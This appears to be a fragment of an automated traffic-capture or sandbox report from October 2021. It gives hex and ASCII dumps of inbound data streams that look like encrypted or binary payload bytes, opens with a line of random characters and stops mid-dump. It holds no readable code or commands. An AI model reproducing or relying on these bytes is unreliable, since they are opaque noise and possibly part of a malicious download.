dx2,x8yj9pr!V#c."s7B^^8DkMwhDBi?SzHWW`8cjI!wWbS8w1 $-Ij8o5O:9\\j_SFgshI&kImIqxBae$l$R43<ID>.3Dcxj#
2021-10-14 02:15:48 UTC	18	IN	Data Raw: 9c a3 86 0c 51 80 33 03 4b a3 6c 09 6f ac 24 b4 5b 40 fb 12 5b fd f9 43 1e de 67 bd d7 0e ee 23 8f b8 f2 45 c1 fd 99 97 b3 1c fc 4d ea ca 35 fd bb c6 83 b9 32 75 31 2c ed 14 31 e2 0c 48 32 2d 64 79 9d 48 bf 44 27 41 1d e7 b4 1a ca 72 95 0d bc 60 b5 2d c3 be 62 4a 7c 95 06 34 01 e7 80 0d 4b 40 7a e0 6e fb 90 6e a0 8d 28 39 2d e3 ab 23 1c 49 b8 cd 35 fc 12 4a 2d e6 9d 05 ca 60 e4 80 93 2e 78 64 56 40 f0 37 58 5b c9 98 cc 0a c6 fa 9e c9 03 e4 10 9d b4 0b 28 73 5e 48 c2 2c 7a 51 19 f4 a9 92 c0 78 c3 6e b7 98 60 6a 9f c9 43 c6 1b c6 38 bc 25 21 bc 92 dd 23 57 67 98 3d be 10 d3 1d 02 39 ea 93 9a 41 98 6e 84 30 54 ff bd 62 e2 08 f3 02 9e 51 64 01 29 64 ff 90 97 39 9c 62 42 67 d0 46 94 a1 9a e6 be e6 a6 e8 88 f5 37 3b 5b d4 cf c8 9b 29 7d 41 51 2b 44 52 46 c4 11 Data Ascii: Q3Klo$[@[Cg#EM52u1,1H2-dyHD'Ar`-bJ\|4K@znn(9-#I5J-`.xdV@7X[(s^H,zQxn`jC8%!#Wg=9An0TbQd)d9bBgF7;[)}AQ+DRF
2021-10-14 02:15:48 UTC	19	IN	Data Raw: 0c e5 ee ca fb 7c dd 58 f4 59 c3 1d 8d b5 b1 02 a8 be cc ec fb d8 da a7 7e 47 20 06 2c 7c 02 9b 38 e1 a1 0e 53 4d 06 ec b3 c9 d9 10 3e ce 70 e0 27 04 f3 8d 00 9b 0b b6 8d 9a c1 70 02 06 ce a4 8f ff 3b 24 24 88 40 a9 58 47 22 5e 2a 3c 6c 51 f8 c9 42 86 59 c4 3e 6a a9 b6 55 80 90 27 f7 0b 44 f0 f3 3f c7 a3 7b 24 a7 f7 e6 c4 bc 2f 18 55 57 bd f9 dd a8 49 ef cf 66 de e4 81 c5 67 42 17 cf fd e6 64 7f 45 5f ab 53 00 34 bf 94 64 38 d7 ca c1 92 f6 37 a9 1f 87 ac 93 ae 2d 8c 09 b7 f6 62 ee 7d 38 85 f9 83 4c d0 8b 63 6f fc 41 3a 33 4b b4 e5 4c 7b e4 30 9a a6 08 d7 ad 6f 44 93 88 81 43 79 de 9e b1 68 0b e5 16 95 13 a6 2a 6d e9 42 08 49 67 08 fa dc 04 1f cb 8e 02 83 74 d3 44 3f 7d 69 02 b6 04 e8 31 0a 76 06 37 c8 c5 12 22 ec ab 0f 85 3a 4f f4 80 9c 54 b6 06 fd b3 33 Data Ascii: \|XY~G ,\|8SM>p'p;$$@XG"^<lQBY>jU'D?{$/UWIfgBdE_S4d87-b}8LcoA:3KL{0oDCyhmBIgtD?}i1v7":OT3
2021-10-14 02:15:48 UTC	20	IN	Data Raw: 34 40 25 04 17 bc 7f 00 b7 d1 84 60 8a 7c a3 3c 9a 0f 8c 99 56 cd 19 f0 f1 a9 7f 58 4c dc 4a 5d da e2 bd 57 57 b3 60 17 7a 88 fc 56 0c c8 8a 5c ca 6c a3 66 01 47 d2 21 8c db 3e f5 12 5b e8 ea 6d dd f7 8b ba c0 22 d8 1a 8b b8 e5 69 f0 03 98 bd a7 0d 9f 85 f9 ce 3f c4 9b dd 7d b2 0a 64 10 16 77 1f 2b d7 d5 72 22 29 7c a2 b4 53 b6 6c 1e 52 20 f9 aa 04 f1 4e 95 1c b2 a7 6e 2d ef bb 37 01 67 86 06 2c 50 7f 97 f3 4a 77 f4 ed 7d ff 91 6c e4 80 96 2e 29 3d ae 4c 77 eb a9 87 20 ed f5 4a 2d e8 99 5d d5 73 e6 a8 d5 28 6e 9c 38 14 f3 20 41 fd d8 c9 d0 3c 60 f9 b2 cd 8a f0 68 ff 63 8d d7 7b 43 8d 8c 36 31 a1 b8 c6 3a 80 c2 02 c3 6e a6 0a 75 2a 02 e3 25 c4 33 c0 9a bc 4d d0 c5 92 db 23 0c de 9b 3d be 2b fc 63 18 3f fb 90 d9 c2 89 69 f0 03 84 fd b9 0b 2a 27 f1 04 8e c0 Data Ascii: 4@%`\|<VXLJ]WW`zV\lfG!>[m"i?}dw+r")\|SlR Nn-7g,PJw}l.)=Lw J-]s(n8 A<`hc{C61:nu%3M#=+c?i'
2021-10-14 02:15:48 UTC	22	IN	Data Raw: 57 60 3e 20 c6 59 70 ce 18 36 a8 7f 7f fa 4a f4 39 5b 76 66 44 f5 a8 c3 07 c4 59 49 d0 86 6e 85 ea 1d ad 88 57 ec ad 1f d0 06 bf e5 ca f3 6d d2 a6 f5 3b c1 1a 95 92 5b 00 a8 a2 6e f3 f4 d4 da af 61 15 d7 07 00 75 05 81 3e 28 b7 1e 5f 42 0e f2 4d d2 f5 07 41 c6 70 e0 23 00 e2 8d 00 91 64 48 8d 12 c2 4a 01 f5 31 5b 90 ec 37 24 2d 9e be a8 74 d1 3c 52 2a 3a 73 43 06 6a 67 84 72 ce 06 1a 57 53 aa aa 8a 17 f3 0b 8f 41 fa 3f ed ad 7b 35 a5 60 10 c4 bc 2a 77 61 57 a7 f3 b2 9c 49 ef c5 6c cd 5e 81 c5 69 67 3f f8 21 ef 6e 73 48 77 54 53 1a 3e ac 91 44 38 d3 ca 2a 16 8d 37 a7 1e 8a 7c 16 a7 2d 8d 2e a3 f6 62 fe 55 38 85 f9 89 45 5e 34 b1 d7 ef 4a 2c 38 5a a6 80 4d 7a eb 3a 93 b7 17 c5 ac 46 05 93 88 87 40 74 a8 f2 6f 14 0b e5 24 b7 07 a6 26 67 c1 42 13 49 6d 65 a1 Data Ascii: W`> Yp6J9[vfDYInWm;[nau>(_BMAp#dHJ1[7$-t<R:sCjgrWSA?{5`waWIl^ig?!nsHwTS>D8*7\|-.bU8E^4J,8ZMz:F@to$&gBIme
2021-10-14 02:15:48 UTC	23	IN	Data Raw: e1 7f 07 b2 b1 cf 4e 70 a0 47 17 7e ca 25 0f 9d 88 c6 c4 9f e6 bb 81 8f 36 66 a6 c4 ff ff 9e 90 70 0e f5 b3 82 8a 8f 04 7c e5 51 0b 19 0d b8 60 e9 48 fc bb 1c b0 77 a3 3f a4 0e 8d b5 5e b5 7f f0 f6 bd 8b 40 73 da 61 49 e6 86 bc a9 84 ae 4c 78 7d 9a cc 5e 72 74 8a 5c ce 43 39 70 38 7f c1 25 be 4d c0 f4 3e 46 e5 fd 74 23 e7 a3 a9 29 09 ea 0a 98 ab f0 6d f8 f9 84 6f a3 37 91 b4 ef f2 56 2a 60 39 8b a4 f0 6f 11 17 dc d7 21 ee d1 72 33 36 54 58 b5 fc b8 44 2d 7d 20 f3 b6 35 aa 4a 95 0b 36 9d 90 2c c7 c0 38 44 7c 91 2e 12 3f 58 80 0d 4f 4c c4 ed 10 de 91 7d e4 12 df 39 34 00 81 69 1a eb af a0 27 5f 56 4d 2d e2 9e 5e b6 43 e2 a8 c0 34 4b 74 47 1d f0 37 56 77 6f ce e5 2e b6 b3 9e cf a7 d8 55 59 af 75 28 73 7c 12 80 3e 3e 2d 11 b4 42 96 e8 02 bd 63 bd 3a 75 02 6a Data Ascii: NpG~%6fp\|Q`Hw?^@saILx}^rt\C9p8%M>Ft#)mo7V*`9o!r36TXD-} 5J6,8D\|.?XOL}94i'_VM-^C4KtG7Vwo.UYu(s\|>>-Bc:uj
2021-10-14 02:15:48 UTC	24	IN	Data Raw: a1 21 64 cb 3e 5e 6a 0a 7b b0 c1 be d7 62 da c7 8f 10 09 d8 90 c2 37 55 82 93 f2 0a 23 e2 75 dc 2b cf 0a df ef 70 bb fb 3e 7f 83 14 04 c0 71 9c 4c 10 30 c7 03 a2 37 42 fe 22 55 69 17 6e 12 d7 e7 14 c2 75 82 df 85 68 ab 26 3b ad 8e 32 14 a5 1f da 08 78 46 c8 fb 72 dd 47 8e 24 d3 63 85 ba b1 06 80 aa cf ec fc f0 fe a7 7e 10 a9 0e 2c 72 06 46 a9 88 a8 0e 51 5d 7d df aa ad d1 10 3f ca 58 ef 24 7e fc a5 24 95 0b bc 0d 1a c8 70 06 d7 bd a6 8f e5 39 3b 05 bb 59 d7 50 d3 2b 5a 02 68 6e 51 fe 43 6f 86 59 c1 be 62 a9 ac 51 5d c4 25 f7 0b 6c 45 fa 3f c1 c2 72 25 a7 42 80 cf bd 20 12 7d 53 a7 f9 db c6 40 ee cf 6c 7f e7 80 c5 63 54 e9 ce 7e ed 7b 6d b4 5e bd ad 1b 6b bd b5 c0 38 d7 ca d4 9a e0 c9 a6 40 85 8c cf a7 2d 8c f8 b6 e0 9c f5 22 14 ee fb 0f 33 d0 83 68 00 f0 Data Ascii: !d>^j{b7U#u+p>qL07B"Uinuh&;2xFrG$c~,rFQ]}?X$~$p9;YP+ZhnQCoYbQ]%lE?r%B }S@lcT~{m^k8@-"3h
2021-10-14 02:15:48 UTC	25	IN	Data Raw: 7b f0 c4 48 29 ef 7a 18 c7 55 e3 46 f5 b8 34 f9 34 ee bb 8c 1b c9 33 7c 65 96 21 e9 a4 ff 8b 83 55 9a 76 33 56 df 46 e7 9a be 55 3d 33 b7 c5 51 51 a0 58 17 7e d5 2d c0 62 a5 e9 cd 8e f3 b0 81 8e 39 89 a1 c0 e5 e8 e0 bf 6f 3c e2 26 35 8c 4e 16 68 01 43 23 17 1e ad 73 3f 58 d1 a8 68 81 64 bc 22 9f ea 8d a4 4f c5 37 0e f7 9b 8a 48 6b cf 65 8e f1 96 5d 8e bb ae 4a 06 61 84 e8 aa 0d 7d 9e 74 d8 4a a3 6c 12 40 ca 34 b0 34 2d f4 12 51 f4 f1 55 30 ed a7 ae cc 17 cf f7 8e 94 fa 6f f8 f6 b1 80 a3 1b 99 8c fb d5 35 c6 84 c6 92 a8 39 7d e7 1f c1 1a 35 d5 da 5a 27 2c 64 56 a6 71 a0 5b 3e 49 20 e2 bc 02 da b4 94 21 b1 ac 8a 27 dc 87 0f 5f 7c 84 19 33 6c 85 81 21 40 4a fc e4 76 2d 82 76 ff b2 7b 34 05 3d b2 3c 35 15 a8 a1 28 93 0e 50 fb f1 be 5f f8 73 f9 a8 d5 37 67 78 Data Ascii: {H)zUF443\|e!Uv3VFU=3QQX~-b9o<&5NhC#s?Xhd"O7Hke]Ja}tJl@44-QU0o59}5Z',dVq[>I !'_\|3l!@Jv-v{4=<5(P_s7gx
2021-10-14 02:15:48 UTC	27	IN	Data Raw: f6 47 4b 6d 87 30 64 48 3c 97 09 19 3a d1 b5 34 57 0a ba f8 80 68 43 86 e0 9b 41 26 95 8e 93 e2 70 eb fa 02 1a 73 39 16 ae c5 1d 7f a4 39 76 7e 0f 53 b1 ce af de 50 28 d4 80 18 98 df b8 d6 32 88 63 9c e3 05 3b 2b 1e e0 30 a0 0d f7 fb 75 93 fd 2e 72 94 33 3a d1 7c 40 1a 0b 3f c5 16 70 d2 54 ff 22 5d 65 6b 4c 04 b3 39 07 cd 60 af c5 5c 7f 7b 83 34 ad 8e 39 87 a9 1d cb 03 b4 ed dc ea 77 f7 4d f5 17 c0 1e 9c b6 de 1e a9 a4 c6 d5 d6 d9 da a7 76 3a 27 86 2c 72 42 04 38 8a a8 0d 42 4e 69 f1 b2 d3 d3 7f 21 cf 70 ea 0f 2c fa 8d 06 86 1f a7 99 03 d8 78 2a 5a ce a4 89 f6 29 23 49 ab 40 a9 58 d3 2b 5e 0a 72 37 72 f8 6b 4b 86 59 cb ce 55 f0 84 c4 80 91 2d 40 1c 92 cc d1 3f c7 ac 68 37 b6 5a fe d7 bb 4c 3b 55 57 a7 f9 dd a9 69 af 94 4e 0f ec 81 cf 41 62 16 cf 2b eb 4c Data Ascii: GKm0dH<:4WhCA&ps99v~SP(2c;+0u.r3:\|@?pT"]ekL9`\{49wMv:',rB8BNi!p,x*Z)#I@X+^r7rkKYU-@?h7ZL;UWiNAb+L
2021-10-14 02:15:48 UTC	28	IN	Data Raw: 34 36 54 32 38 c5 81 91 23 88 c1 da c4 45 53 ba 71 c1 ad 11 89 55 f9 f6 55 7b b3 f0 40 f1 a4 d6 41 5e 52 ef 22 1c cf 8a 4c 6a fe 13 73 11 f1 58 01 cb d9 cd 5d ea 97 e2 54 18 e0 b3 b5 4a e1 27 77 72 4a bf c4 bb d0 99 8b 52 9a 6b 38 47 38 44 cb 96 d5 fa 38 33 b1 ce 5d 60 a2 48 01 7e c9 90 e0 97 b3 d3 50 b3 e2 bb 91 29 3e 93 b4 e4 e1 e5 f4 a1 68 83 de 3d 35 9c 46 04 61 f2 54 18 85 0d b1 6f 01 d5 c1 a5 75 ba d0 a3 3b 86 d7 9c b8 42 4a 3e ef e7 bb 97 c3 48 cf 61 58 e8 4d 50 a8 a8 ae 62 03 7a 9b c6 7c 38 50 8a 56 be 59 a3 66 0b 42 c6 34 b3 4a 39 7b a5 43 23 f8 ec 50 d3 a6 bf dd 1b ce 18 87 ac dc 77 ea fd 9f 86 2f 1c 93 9f eb d9 33 c4 93 d0 92 b6 0e 72 19 1e e7 b6 26 c8 c2 79 22 26 70 48 a2 f2 90 44 2d 53 33 fe b6 10 f4 5d 09 1c bb 95 33 2c c3 b4 0d 49 6a 05 2e Data Ascii: 46T28#ESqUU{@A^R"LjsX]TJ'wrJRk8G8D83]`H~P)>h=5FaTou;BJ>HaXMPbz\|8PVYfB4J9{C#Pw/3r&y"&pHD-S3]3,Ij.
2021-10-14 02:15:48 UTC	29	IN	Data Raw: 92 db 61 54 2f ae d7 98 6e 2e 49 04 3e 08 a8 5e 1a 46 5c 67 a0 6e 76 d4 2d f3 3b 40 11 7a 5e fd 31 71 f2 77 3c 38 1e 06 b3 fc 57 7a 6c a1 4e 4c 58 2c 8b 09 2a 03 e7 db 1c 5c 1b bf f8 b3 a9 3f a0 e3 8a 44 1f a3 96 fc c2 62 e5 e1 1c 22 0d 1c c1 78 dc 03 79 a3 27 5a e4 b9 3c 97 c3 be db 59 db d8 cf 97 a2 d0 90 c3 20 a9 78 b4 ed 22 30 dc 1b f0 72 99 17 de ef 7e e0 d2 3c 7f 8f 2f 06 d1 57 87 ed 77 12 c6 07 75 e9 67 ef 05 7f 61 6f 5d 01 81 b8 16 c2 77 82 fc 84 68 ab 61 67 ad 8e 32 87 85 18 cb 0a b4 c1 a5 c1 73 df 52 2a 1b db 3b a1 bd a0 24 c7 f3 cc ec f0 04 dd ad a0 03 2e 0c f2 67 05 91 e6 9b 8d 26 64 42 06 e6 a0 fa f1 28 3f ce 7a 3e 27 79 d0 8b 2a d4 77 b6 8d 10 c8 70 02 be ce a4 8f c4 3b 24 25 5d 40 a9 58 c2 2b 5e 2a 32 6c 51 f8 69 4b 86 59 3c 3e 6a a9 8d 55 Data Ascii: aT/n.I>^F\gnv-;@z^1qw<8WzlNLX,\?Db"xy'Z<Y x"0r~</Wwugao]whag2sR;$.g&dB(?z>'ywp;$%]@X+^2lQiKY<>jU
2021-10-14 02:15:48 UTC	31	IN	Data Raw: a5 af 50 42 7f 1d 81 a8 08 a2 33 9c 9d aa 8b c9 50 fe 95 e1 5a 79 f8 e2 ed 8c 50 45 31 96 16 0e fe 98 41 0b 4d 4c 31 5c 41 27 35 6a ad 3e c5 8b 81 33 f3 4d f2 67 4f 40 b6 48 d6 b9 39 02 f5 e8 fb 50 fc a5 fa 54 e4 ab 4f 7a 76 f1 ee 31 1a c6 0a 65 7d 62 03 57 35 e6 c4 1a d0 4d e5 c1 fb 9a d3 ee 84 f1 b5 87 07 7d 36 71 72 b4 95 ef bb da be 87 41 98 62 2c 7e 2e 58 c7 6e cc 5b 42 27 61 4e 4e 6b b2 6b 03 6f ce 38 d9 80 a7 c5 da 97 6f bc 90 8b 2e 8b ac f9 fb ff e7 9d 61 0e f1 37 97 8c 5e 1e 6f c7 ce 30 19 1c bd da 06 42 c8 b9 6b 30 66 a8 22 9a 7d b2 b5 54 db b0 e1 fd ad 9b d5 5f de 61 59 40 8c 49 bb a2 a4 40 03 6e 80 41 7b 0c 51 8b 4f c6 5a af 70 07 cd d0 29 a3 4d a2 e4 1e 43 ee 72 61 2f ef b1 23 c6 04 dc 1f 13 a9 f8 7a c1 5a 99 91 a8 3d 8c 92 f9 c5 3f c4 90 d1 Data Ascii: PB3PZyPE1AML1\A'5j>3MgO@H9PTOzv1e}bW5M}6qrAb,~.Xn[B'aNNkko8o.a7^o0Bk0f"}T_aY@I@nA{QOZp)MCra/#zZ=?
2021-10-14 02:15:48 UTC	32	IN	Data Raw: d7 6f fb f2 97 3c d0 db 21 6d e3 52 a0 82 9a ef ae c5 2a c4 8a e2 12 0c 52 cb cc 22 89 02 57 52 54 13 30 73 c7 45 08 e9 ef 15 f2 64 1e bf a2 f9 a9 74 b5 69 01 1b 43 ac ac 5f 46 09 77 80 88 76 e0 16 d6 38 40 26 6b 5b eb 63 55 e4 79 32 1c 20 28 b3 fe 5e a6 7c a9 2c 15 6e 2c 81 1c 7b 59 c5 b4 3e 56 02 b9 e9 99 a9 ae 88 ce 88 56 02 81 87 85 16 62 c9 e9 1a 0c 62 3f d9 86 d7 3e 7f 9e 34 75 a5 09 51 d4 8e bf d1 40 d4 c7 8f 1a 9a e0 92 c2 66 88 69 91 b6 0a 21 ec 1b e3 19 fc 02 d7 f6 8a 92 db 39 66 af 26 2c c0 79 81 32 19 1c c5 1f 73 fa 48 e6 dc 56 5a 62 5f 19 a8 c7 59 c3 71 a0 ff 8f 71 a1 0e 17 b7 70 39 b8 a0 18 b5 42 a4 e9 c0 e3 41 c7 4f de 0c c6 1d 85 ac 4f 03 84 a6 db e0 fa d0 c1 59 7f 36 2b 2d 2e 59 b3 81 12 8a a8 0e 48 72 04 ec 85 d3 d9 10 3f ce 70 e0 25 53 Data Ascii: o<!mR*R"WRT0sEdtiC_Fwv8@&k[cUy2 (^\|,n,{Y>VVbb?>4uQ@fi!9f&,y2sHVZb_Yqqp9BAOOY6+-.YHr?p%S
2021-10-14 02:15:48 UTC	33	IN	Data Raw: 19 87 d2 03 83 70 a9 58 38 e6 74 d8 a1 dd 65 1a 0a 6c 07 3a c0 d3 09 be e5 e0 07 31 a6 48 ed 83 28 a2 ba 10 f4 a6 34 66 a9 98 23 65 4b 76 92 94 a1 d9 bf 4e bb b5 bb 8b c9 5a 5c f4 aa 18 47 e5 dd ed 86 e5 7b 29 94 82 a8 ed 51 49 3a 40 59 19 dd 1e 93 af 75 0a 39 c5 8b 93 17 e2 59 53 c4 4f 40 f4 60 c7 a8 11 9f 57 f9 fa 41 99 2c f0 40 fa bd cb db c1 d1 10 22 16 d7 37 78 42 df 11 5b 24 83 0f 0a dc 5f 88 75 7d 96 ca f2 1b 8f 21 9d 10 eb 2b 75 eb 2b 12 10 bb d0 98 a9 5e a3 4c 2f 6f 27 34 9c 91 cd 7d 45 2a b8 41 f9 bd bb cd a0 b9 d9 e8 e6 4a 29 ee dc 8c e3 b1 96 9d 38 04 a1 ff f9 67 57 01 ec 07 e7 3b 2d 94 db be 58 ea 43 0f 13 1a a4 71 99 fe 06 a0 ec 25 c3 3f 33 9a f7 94 bc da 6d c4 f8 78 00 a9 4c 61 de 6b 5e c8 83 40 80 bb 85 43 17 49 9a cc 54 45 51 8a 4d dc 58 Data Ascii: pX8tel:1H(4f#eKvNZ\G{)QI:@Yu9YSO@`WA,@"7xB[$_u}!+u+^L/o'4}E*AJ)8gW;-XCq%?3mxLak^@CITEQMX
2021-10-14 02:15:48 UTC	34	IN	Data Raw: 4a 40 a9 52 fb b7 5e 2a 38 7f 5d e9 6d 4c 90 5e 45 89 05 00 ac 55 8a 99 36 fb 05 41 50 f6 50 99 ac 7b 2e 8f 17 ee c4 b6 33 12 7d c0 a7 f9 d7 b8 43 80 57 66 10 e7 92 ce 78 44 06 c4 37 fe 6f f1 fd 30 02 53 1a 3e ae 81 0b ff d7 ca 20 b6 58 e9 b1 0e 93 d9 51 a7 2d 8d 2a bb e7 76 81 46 38 84 f8 ec 1b d0 83 63 b3 ed 49 3d 25 4c 2c 58 23 d2 eb 30 90 8e 23 d4 ad 68 57 96 99 84 63 70 d0 9a 97 08 0a e5 2f 92 3b 31 26 6d e3 4b 7d d1 67 09 f0 cf 00 0e f2 95 06 95 6b d7 ca 88 5f ca 02 b6 01 f9 37 0e 7a 02 b9 7e aa bb 22 ec fd 2d de 3b 41 fe a8 b1 3d bc 00 fb 94 01 4d bc 9f 0b 48 42 7f 16 4c 21 03 ba 28 8b b2 aa 8d d8 5d 4a 95 ed cd d8 1b 74 ed 8c 5b f6 26 f2 71 1f fa 81 58 09 49 49 11 b2 11 27 33 76 33 30 d4 82 ef 73 e7 59 d0 d7 40 51 b3 13 92 b9 39 02 44 f4 e1 4e 99 Data Ascii: J@R^8]mL^EU6APP{.3}CWfxD7o0S> XQ-vF8cI=%L,X#0#hWcp/;1&mK}gk_7z~"-;A=MHBL!(]Jt[&qXII'3v30sY@Q9DN
2021-10-14 02:15:48 UTC	35	IN	Data Raw: d7 02 cd d7 95 a9 f1 02 8d fc 99 9b ab 74 f6 9e ea c0 e3 0b 95 cf af b5 2f 0c 4e 1e ed 1e eb cc d6 1d 25 2c 64 56 9f 7f bf 45 31 52 20 f1 a7 23 e2 50 cd 0d b8 bd 90 2c c3 bc 1c 4a 7c cf 6a 2c 4b 7b 80 0d 4b 40 c7 f1 6e 7c 91 7d e0 d1 68 2f 14 38 a2 50 7b ea a9 87 2e f1 67 4b 2d e8 b8 49 c0 68 e6 c7 d2 2d 78 68 56 a0 f0 37 58 96 fa d9 d4 28 8d fe ed e9 a0 f5 5a 97 99 63 2d 62 52 34 a7 3f 38 25 1e f1 b1 f9 c1 03 c3 64 ac 3f 69 45 af e0 25 ce 18 e8 fc ac 65 03 d4 96 cc 2c 10 2b 9b 3d b2 2b fc 0c 05 2e ff 82 e4 97 16 d9 e1 34 85 fd b7 6f 14 3c e0 07 f7 5a 1d 01 23 67 b8 9d 94 39 90 96 e0 6d d9 60 ba 86 f5 b1 b8 3b 21 34 80 f2 70 1a 5a d4 cf f6 88 2f 49 79 51 29 4e c7 38 a0 7a e2 ca 1f f0 61 54 2c bd fa 87 11 d6 62 0e 3e 09 bb 7a 10 73 47 7f 30 4d 60 ca 48 e6 Data Ascii: t/N%,dVE1R #P,J\|j,K{K@n\|}h/8P{.gK-Ih-xhV7X(Zc-bR4?8%d?iE%e,+=+.4o<Z#g9m`;!4pZ/IyQ)N8zaT,b>zsG0M`H
2021-10-14 02:15:48 UTC	36	IN	Data Raw: 2d 5e 17 93 18 8e a9 0e 53 6a 16 ed b3 d9 f1 7f 3e ce 7a cc 1b 62 e9 8a 00 84 0c a9 86 ec c9 5c 14 02 ee a1 8e e5 3b 0c 35 89 40 a3 70 bc 2a 5e 20 1e 3e 4e f4 78 4c 86 48 cc 21 67 57 ad 79 88 80 21 db 4a 5b 4f e9 38 c7 bc 7c 3b ad b6 ee e8 a5 28 38 54 56 a7 f9 f5 b9 48 ef c5 4e 7f ec 81 cf 53 47 e8 30 de f0 6f 6c 4d 5f ba 54 0c ca be b9 67 2f c4 cd 2a 8a f1 28 a8 e1 86 80 68 8c 28 b4 62 49 09 9d 8a 0f 39 84 f3 ab 39 d1 83 63 6c f8 4a 12 a5 4b a2 e9 66 7b f0 00 9f a6 75 d7 ad 6e 14 93 88 90 70 79 dc 81 b2 6a 70 b1 25 9f 17 8e 07 6d e9 48 7d 3f 66 09 f0 ca 9e 37 83 85 02 89 76 c1 46 17 48 62 02 bc 23 f8 30 0a 66 10 1f 5c c5 12 24 c4 e7 04 85 30 3c a1 80 9c 3a be 7d a8 bc 33 4a c2 eb 22 6f 48 57 65 22 b9 09 96 20 46 ac bd 9c 1f 50 5a 9b e0 72 c3 aa d3 c8 a4 Data Ascii: -^Sj>zb\;5@p^ >NxLH!gWy!J[O8\|;(8TVHNSG0olM_Tg/(h(bI99clJKf{unpyjp%mH}?f7vFHb#0f\$0<:}3J"oHWe" FPZr
2021-10-14 02:15:48 UTC	38	IN	Data Raw: 62 de 67 26 82 9d 42 ac 80 11 48 17 7c b3 72 54 0c 5b e5 66 cb 4b a9 60 7f 2f c0 25 be 34 41 f4 12 51 ea e9 5b 40 e4 a0 97 57 09 c6 03 83 be fc 02 f4 fc 99 9b af 12 bb b0 ea ca 35 f8 9d ed ca ba 0e d0 19 1e eb 07 33 d5 d5 fc 84 3b 55 66 a4 7b ac 4d 3b 41 28 d8 8e 0c eb 5b 9d 97 a5 bb 81 2a c4 96 38 44 7c 9f 11 29 50 7e a8 3c 4b 5b fd d9 67 ea 94 75 e9 b4 d9 2f 05 2a b8 2b 0d 3d ba 85 33 8a 14 43 a3 55 87 8f da 67 ca 29 c5 2c 72 4f ad e6 fe 25 55 07 ce cc d4 22 85 97 c9 cf a1 ff 8c ae 9c 72 29 63 54 5b 82 3e c6 2d 72 8f aa 98 e8 02 c3 6e a6 0a 74 2a b3 e1 25 c4 48 c0 9a bc 4d b6 c6 92 db 22 78 1e e4 5e b8 38 ff 35 2c 3d fb 92 dd bd 9a 6e 88 77 43 fc bd 62 cd 5d ff 03 98 3a 68 4c 29 6e d6 f2 4b 33 9d 66 38 60 bf 1b bc 8f 90 3a be 11 2b e8 89 e5 1f 0c 59 d4 Data Ascii: bg&BH\|rT[fK`/%4AQ[@W53;Uf{M;A([8D\|)P~<K[gu/+=3CUg),rO%U"r)cT[>-rnt*%HM"x^85,=nwCb]:hL)nK3f8`:+Y
2021-10-14 02:15:48 UTC	39	IN	Data Raw: d2 87 74 ad 0e 1d ad 88 38 f6 c5 1f cc 0c a5 e9 ca fb 72 d9 58 8e 97 ca 08 97 ba b1 03 bb 94 cf ec a0 d9 da a7 29 1a 29 17 3a 61 07 a3 7e 8b a8 0e 53 53 03 f6 4d d2 f5 04 39 cc 58 fe 24 7e fc a5 24 95 0b bc e2 de c8 70 08 11 dd a1 8f f4 3e 3c db 89 6c a0 2b 6f 2b 5e 20 38 75 42 fd 6b 5a 83 46 c2 c0 6b 85 a5 44 84 98 bd fb 14 4e 52 ff 3f d6 a8 64 2b 59 49 c3 cf aa ad 0d 55 57 a6 d3 c2 b9 5a ea cf 77 15 f2 8d 3b 68 6e 1f c6 36 39 69 60 47 4c ae 53 0b 31 a0 9f 9a 39 fb db 22 b3 96 34 a7 19 e8 31 6a a7 27 a0 e4 a8 fd 71 f1 7d 29 81 e6 88 b2 d1 af 7c 69 f4 67 24 30 4b a4 c7 68 7b eb 3a f5 6a 12 d7 a7 71 48 80 8d 81 77 76 c1 90 41 69 27 ec 1d 3e 13 a6 26 72 e6 51 17 49 76 0c ed 22 05 33 f7 9c 11 86 7a c2 41 23 ce 62 2e bd 09 c0 bb 0b 6c 0c 24 cd d8 01 27 ec e6 Data Ascii: t8rX)):a~SSM9X$~$p><l+o+^ 8uBkZFkDNR?d+YIUWZw;hn69i`GLS19"41j'q})\|ig$0Kh{:jqHwvAi'>&rQIv"3zA#b.l$'
2021-10-14 02:15:48 UTC	40	IN	Data Raw: f8 f6 e9 a3 ec 1f f9 22 3f 8b c9 18 78 e0 49 19 85 0d b4 73 15 50 d7 be 7d 9e 5f b6 3a 8c fb 8f 3b e3 c5 02 2a e1 61 0c 72 60 de 60 54 e0 82 4d a0 be b7 c4 a0 65 94 16 7c 19 50 8a 56 b9 dc a2 66 16 42 c7 3a a4 d6 15 f5 12 5a ea eb 78 ad 41 b6 ba 59 bf 1c 1e 55 af 22 e0 c2 fd 99 90 af 13 9b 11 5d d5 2f 0f 8e c3 95 ac 36 4b 0c 1f ed 1e 3f d2 d8 64 3b a3 d3 4d b0 f1 08 9e 05 47 21 f3 ad 35 75 4a 95 07 a7 bb 93 2b d7 b7 0d 41 13 0d 03 2c 47 14 96 0c 4b 51 e4 f1 7f ff b9 e1 e0 9c 62 25 db 3d 8c 0b 2d eb a9 87 31 85 11 40 05 da b5 40 c2 be e2 ae ee 2c 78 63 29 38 f0 37 52 af d8 5d 0f 22 8f e2 9e cf a0 ee 60 80 9c 4f 28 73 54 7b 80 3e 29 2d 23 fd ab f9 21 02 c3 64 ab 09 73 3e af c9 b2 c4 1b ca b2 ea 64 09 cd 90 b2 b1 7f 00 90 29 ae 10 69 1c 02 35 94 82 f4 93 92 Data Ascii: "?xIsP}_:;*ar``TMe\|PVfB:ZxAYU"]/6K?d;MG!5uJ+A,GKQb%=-1@@,xc)87R]"`O(sT{>)-#!ds>d)i5
2021-10-14 02:15:48 UTC	41	IN	Data Raw: 82 fd 0d e5 1a a0 02 df e5 67 97 fe 21 f3 ba 3c 20 c1 67 be 59 19 30 cd 2b 61 eb 44 e6 ae 68 76 6e 5c 1d 81 7a 15 c2 7b 86 dc 56 21 ad 0e 1d 85 9a 38 94 a7 0c dd 27 a9 39 80 fb 72 dd 70 e0 17 ca 17 9e bd a7 11 a0 da be ed fa d2 c9 ae 68 08 21 14 25 5a 61 9b 38 8c 24 31 53 42 07 ff b5 c2 df 38 65 ce 70 ea 31 50 fd 8b 0b 48 9b b2 8d 12 d9 79 0e 79 58 a5 8f ef 28 2e 34 82 52 80 70 bc 28 5e 2c 1a fb 50 f8 61 5a af 71 bb 3d 6a af c3 cd 81 91 2d e6 01 56 68 d2 4e c4 ad 7d 0c 30 49 ef ce ad 09 30 27 54 a7 ff b2 31 48 ef c5 77 1a ff a8 ed 1a 41 17 c9 09 78 65 7f 40 4e 82 7b 6e 37 bf 93 0b a0 d6 ca 20 8a fc 25 8e 37 f2 af 6a a1 05 1b 07 b7 fc 